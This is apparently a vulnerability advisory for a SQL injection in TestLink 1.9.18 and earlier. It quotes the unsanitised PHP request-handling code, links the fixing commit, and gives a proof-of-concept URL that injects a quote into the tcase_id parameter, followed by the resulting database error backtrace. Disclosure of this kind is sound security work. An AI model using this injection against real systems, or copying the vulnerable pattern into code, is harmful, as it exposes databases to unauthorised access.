Affected software: Testlink 1.9.18 and prior
Credit: Maksymilian Arciemowicz (CXSECURITY)
Affected code:
----------------
$tcase_id = isset($_REQUEST['tcase_id']) ? $_REQUEST['tcase_id']: null;
$tcversion_id = isset($_REQUEST['tcversion_id']) ? $_REQUEST['tcversion_id']: 0;
$info = '';
if( !is_null($tcase_id) )
{
if($tcversion_id > 0 )
{
$tcase = $tcase_mgr->get_by_id($tcase_id,$tcversion_id);
----------------
Patch:
https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/2c85dc8f472f4eedba70a24456be5239dc3045a3
PoC
http://localhost/lib/ajax/gettestcasesummary.php?tcase_id=1%27
Error message and SQL Syntax:
==============================================================================
DB Access Error - debug_print_backtrace() OUTPUT START
ATTENTION: Enabling more debug info will produce path disclosure weakness (CWE-200)
Having this additional Information could be useful for reporting
issue to development TEAM.
==============================================================================
#0 database->exec_query(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:563]
#1 database->fetchFirstRow(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' ) called at [/opt/bitnami/testlink/lib/functions/database.class.php:545]
0000002 database->fetchFirstRowSingleColumn(/* Class:testcase - Method: get_last_version_info */ SELECT MAX(version) AS version FROM tcversions TCV JOIN nodes_hierarchy NH_TCV ON NH_TCV.id = TCV.id WHERE NH_TCV.parent_id = 1' , version) called at [/opt/bitnami/testlink/lib/functions/testcase.class.php:1977]
0000003 testcase->get_last_version_info(1') called at [/opt/bitnami/testlink/lib/ajax/gettestcasesummary.php:35]
